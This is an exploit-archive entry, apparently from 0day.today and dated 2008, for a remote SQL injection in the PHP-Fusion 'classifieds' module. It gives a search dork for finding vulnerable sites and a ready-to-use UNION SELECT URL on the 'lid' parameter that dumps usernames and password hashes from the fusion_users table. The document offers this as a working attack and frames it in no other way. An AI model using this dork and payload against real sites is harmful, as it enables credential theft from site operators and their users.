id: 3316
date: 06/26/2008
title: PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability
author: boom3rang
cves: 

===================================================================
PHP-Fusion Mod classifieds (lid) Remote SQL Injection Vulnerability
===================================================================




#################################
Php fusion "classifieds"  SQL-injetion  
#################################

++++++++++++++++++++++++++++
Author     :     boom3rang
++++++++++++++++++++++++++++



----> Remote SQL Injection <------


[+] Dork:                     inurl:"classifieds.php?op=detail_adverts"


[+] Example:  www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid= [SQL]



exploit:
www.SITE.com/infusions/classifieds/classifieds.php?op=detail_adverts&lid=-9999+union+all+select+1,user_name,user_password,4,5,6,null,null+from+fusion_users--



##########################################
  greetz to:   All my albanian brothers
     =United State of Albania = 
##########################################



#  0day.today [2023-03-24]  #